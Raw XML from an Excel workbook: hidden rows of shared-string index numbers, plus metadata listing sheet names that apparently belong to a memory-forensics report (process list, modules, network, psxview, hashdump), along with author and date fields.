    <row r="13700" spans="1:6" hidden="1" x14ac:dyDescent="0.25">
      <c r="A13700" t="s">
        <v>25235</v>
      </c>
      <c r="B13700" t="s">
        <v>13585</v>
      </c>
    </row>
    <row r="13701" spans="1:6" hidden="1" x14ac:dyDescent="0.25">
      <c r="A13701" t="s">
        <v>26501</v>
      </c>
      <c r="B13701" t="s">
        <v>13585</v>
      </c>
    </row>
    <row r="13702" spans="1:6" hidden="1" x14ac:dyDescent="0.25">
      <c r="A13702" t="s">
        <v>27809</v>
      </c>
      <c r="B13702" t="s">
        <v>27810</v>
      </c>
    </row>
    <row r="13703" spans="1:6" hidden="1" x14ac:dyDescent="0.25">
      <c r="A13703" t="s">
        <v>1627</v>
      </c>
      <c r="B13703" t="s">
        <v>1628</v>
      </c>
    </row>
    <row r="13704" spans="1:6" hidden="1" x14ac:dyDescent="0.25">
      <c r="A13704" t="s">
        <v>1625</v>
      </c>
      <c r="B13704" t="s">
        <v>1626</v>
      </c>
    </row>
    <row r="13705" spans="1:6" hidden="1" x14ac:dyDescent="0.25">
      <c r="A13705" t="s">
        <v>24728</v>
      </c>
      <c r="B13705" t="s">
        <v>24729</v>
      </c>
    </row>
    <row r="13706" spans="1:6" hidden="1" x14ac:dyDescent="0.25">
      <c r="A13706" t="s">
        <v>27820</v>
      </c>
      <c r="B13706" t="s">
        <v>27821</v>
      </c>
    </row>
    <row r="13707" spans="1:6" hidden="1" x14ac:dyDescent="0.25">
      <c r="A13707" t="s">
        <v>16376</v>
      </c>
      <c r="B13707" t="s">
        <v>16377</v>
      </c>
    </row>
    <row r="13708" spans="1:6" hidden="1" x14ac:dyDescent="0.25">
      <c r="A13708" t="s">
        <v>24697</v>
      </c>
      <c r="B13708" t="s">
        <v>24698</v>
      </c>
    </row>
    <row r="13709" spans="1:6" hidden="1" x14ac:dyDescent="0.25">
      <c r="A13709" t="s">
        <v>1766</v>
      </c>
      <c r="B13709" t="s">
        <v>1767</v>
      </c>
    </row>
    <row r="13710" spans="1:6" hidden="1" x14ac:dyDescent="0.25">
      <c r="A13710" t="s">
        <v>16394</v>
      </c>
      <c r="B13710" t="s">
        <v>16395</v>
      </c>
    </row>
    <row r="13711" spans="1:6" hidden="1" x14ac:dyDescent="0.25">
      <c r="A13711" t="s">
        <v>16378</v>
      </c>
      <c r="B13711" t="s">
        <v>16379</v>
      </c>
    </row>
    <row r="13712" spans="1:6" hidden="1" x14ac:dyDescent="0.25">
      <c r="A13712" t="s">
        <v>2940</v>
      </c>
      <c r="B13712" t="s">
        <v>2941</v>
      </c>
      <c r="C13712" t="s">
        <v>2942</v>
      </c>
      <c r="D13712" t="s">
        <v>2943</v>
      </c>
      <c r="E13712" t="s">
        <v>2944</v>
      </c>
      <c r="F13712" t="s">
        <v>2945</v>
      </c>
    </row>
    <row r="13713" spans="1:2" hidden="1" x14ac:dyDescent="0.25">
      <c r="A13713" t="s">
        <v>26281</v>
      </c>
      <c r="B13713" t="s">
        <v>26282</v>
      </c>
    </row>
    <row r="13714" spans="1:2" hidden="1" x14ac:dyDescent="0.25">
      <c r="A13714" t="s">
        <v>1344</v>
      </c>
    </row>
    <row r="13717" spans="1:2" hidden="1" x14ac:dyDescent="0.25">
      <c r="A13717" t="s">
        <v>1424</v>
      </c>
    </row>
    <row r="13719" spans="1:2" hidden="1" x14ac:dyDescent="0.25">
      <c r="A13719" t="s">
        <v>8504</v>
      </c>
    </row>
    <row r="13720" spans="1:2" hidden="1" x14ac:dyDescent="0.25">
      <c r="A13720" t="s">
        <v>9167</v>
      </c>
    </row>
    <row r="13721" spans="1:2" hidden="1" x14ac:dyDescent="0.25">
      <c r="A13721" t="s">
        <v>11542</v>
      </c>
    </row>
    <row r="13722" spans="1:2" hidden="1" x14ac:dyDescent="0.25">
      <c r="A13722" t="s">
        <v>11564</v>
      </c>
    </row>
    <row r="13723" spans="1:2" hidden="1" x14ac:dyDescent="0.25">
      <c r="A13723" t="s">
        <v>13386</v>
      </c>
    </row>
    <row r="13724" spans="1:2" hidden="1" x14ac:dyDescent="0.25">
      <c r="A13724" t="s">
        <v>14665</v>
      </c>
    </row>
    <row r="13725" spans="1:2" hidden="1" x14ac:dyDescent="0.25">
      <c r="A13725" t="s">
        <v>11542</v>
      </c>
    </row>
    <row r="13726" spans="1:2" hidden="1" x14ac:dyDescent="0.25">
      <c r="A13726" t="s">
        <v>11564</v>
      </c>
    </row>
    <row r="13727" spans="1:2" hidden="1" x14ac:dyDescent="0.25">
      <c r="A13727" t="s">
        <v>18945</v>
      </c>
    </row>
    <row r="13728" spans="1:2" hidden="1" x14ac:dyDescent="0.25">
      <c r="A13728" t="s">
        <v>27089</v>
      </c>
    </row>
    <row r="13729" spans="1:1" hidden="1" x14ac:dyDescent="0.25">
      <c r="A13729" t="s">
        <v>1313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OS Info</vt:lpstr>
      <vt:lpstr>Process list</vt:lpstr>
      <vt:lpstr>PS Tree</vt:lpstr>
      <vt:lpstr>Modules</vt:lpstr>
      <vt:lpstr>net</vt:lpstr>
      <vt:lpstr>DriveScan</vt:lpstr>
      <vt:lpstr>psxview</vt:lpstr>
      <vt:lpstr>hashdump</vt:lpstr>
      <vt:lpstr>files</vt:lpstr>
      <vt:lpstr>cmdLine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Литовка</dc:creator>
  <cp:lastModifiedBy>Иван Литовка</cp:lastModifiedBy>
  <dcterms:created xsi:type="dcterms:W3CDTF">2015-06-05T18:19:34Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-10-21T09:36:56Z</dcterms:modified>
</cp:coreProperties>
</file>